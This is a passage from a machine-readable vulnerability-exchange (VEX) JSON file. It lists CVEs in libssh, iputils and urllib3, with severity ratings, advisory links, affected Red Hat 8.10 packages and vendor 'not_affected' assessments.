        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-18683.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:18683"
        },
        {
          "url": "https://git.libssh.org/projects/libssh.git/commit/?id=697650caa97eaf7623924c75f9fcfec6dd423cd1"
        },
        {
          "url": "https://git.libssh.org/projects/libssh.git/commit/?id=b35ee876adc92a208d47194772e99f9c71e0bedb"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-4878.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-18683.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4878"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7619-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7696-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-4878"
        },
        {
          "url": "https://www.libssh.org/security/advisories/CVE-2025-4878.txt"
        }
      ],
      "published": "2025-07-22T15:15:36+00:00",
      "updated": "2026-06-30T11:16:23+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-48964",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        190
      ],
      "description": "ping in iputils before 20250602 allows a denial of service (application error in adaptive ping mode or incorrect data collection) via a crafted ICMP Echo Reply packet, because a zero timestamp can lead to large intermediate values that have an integer overflow when squared during statistics calculations. NOTE: this issue exists because of an incomplete fix for CVE-2025-47268 (that fix was only about timestamp calculations, and it did not account for a specific scenario where the original timestamp in the ICMP payload is zero).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-48964"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:17558"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18162"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-48964"
        },
        {
          "url": "https://bugzilla.redhat.com/2382657"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2382657"
        },
        {
          "url": "https://bugzilla.suse.com/show_bug.cgi?id=1243772"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-48964"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-18162.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:17558"
        },
        {
          "url": "https://github.com/iputils/iputils/commit/afa36390394a6e0cceba03b52b59b6d41710608c"
        },
        {
          "url": "https://github.com/iputils/iputils/issues"
        },
        {
          "url": "https://github.com/iputils/iputils/releases/tag/20250602"
        },
        {
          "url": "https://github.com/iputils/iputils/security/advisories/GHSA-25fr-jw29-74f9"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-48964.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-18162.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48964"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7670-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-48964"
        }
      ],
      "published": "2025-07-22T18:15:36+00:00",
      "updated": "2026-06-17T09:30:35+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "20180629-11.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-50181",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        601
      ],
      "description": "urllib3 is a user-friendly HTTP client library for Python. Prior to 2.5.0, it is possible to disable redirects for all requests by instantiating a PoolManager and specifying retries in a way that disable redirects. By default, requests and botocore users are not affected. An application attempting to mitigate SSRF or open redirect vulnerabilities by disabling redirects at the PoolManager level will remain vulnerable. This issue has been patched in version 2.5.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-50181"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-50181"
        },
        {
          "url": "https://github.com/urllib3/urllib3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/commit/f05b1329126d5be6de501f9d1e3e36738bc08857"
        },
        {
          "url": "https://github.com/urllib3/urllib3/releases/tag/2.5.0"
        },
        {
          "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-pq67-6m6q-mj2v"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50181"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7599-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7599-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-50181"
        }
      ],
      "published": "2025-06-19T01:15:24+00:00",
      "updated": "2026-06-17T09:34:48+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "9.0.3-24.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "9.0.3-24.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-50182",
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        601
      ],
      "description": "urllib3 is a user-friendly HTTP client library for Python. Starting in version 2.2.0 and prior to 2.5.0, urllib3 does not control redirects in browsers and Node.js. urllib3 supports being used in a Pyodide runtime utilizing the JavaScript Fetch API or falling back on XMLHttpRequest. This means Python libraries can be used to make HTTP requests from a browser or Node.js. Additionally, urllib3 provides a mechanism to control redirects, but the retries and redirect parameters are ignored with Pyodide; the runtime itself determines redirect behavior. This issue has been patched in version 2.5.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-50182"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-50182"
        },
        {
          "url": "https://github.com/urllib3/urllib3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/commit/7eb4a2aafe49a279c29b6d1f0ed0f42e9736194f"
        },
        {
          "url": "https://github.com/urllib3/urllib3/releases/tag/2.5.0"
        },
        {
          "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-48p4-8xcf-vxj5"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50182"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7599-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-50182"
        }
      ],
      "published": "2025-06-19T02:15:17+00:00",
      "updated": "2026-06-17T09:34:48+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
